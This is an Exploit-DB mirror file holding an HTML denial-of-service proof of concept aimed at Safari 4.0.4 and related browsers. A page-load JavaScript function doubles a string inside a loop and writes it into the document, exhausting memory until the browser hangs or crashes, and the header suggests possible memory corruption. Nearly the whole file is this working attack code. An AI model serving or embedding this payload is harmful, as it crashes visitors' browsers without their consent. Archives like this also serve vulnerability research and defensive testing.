exploit-db-mirror/exploits/windows/dos/11347.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
392 B
HTML

<!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)
Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1
Author : 599eme Man
Contact : flouf@live.fr
-->
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>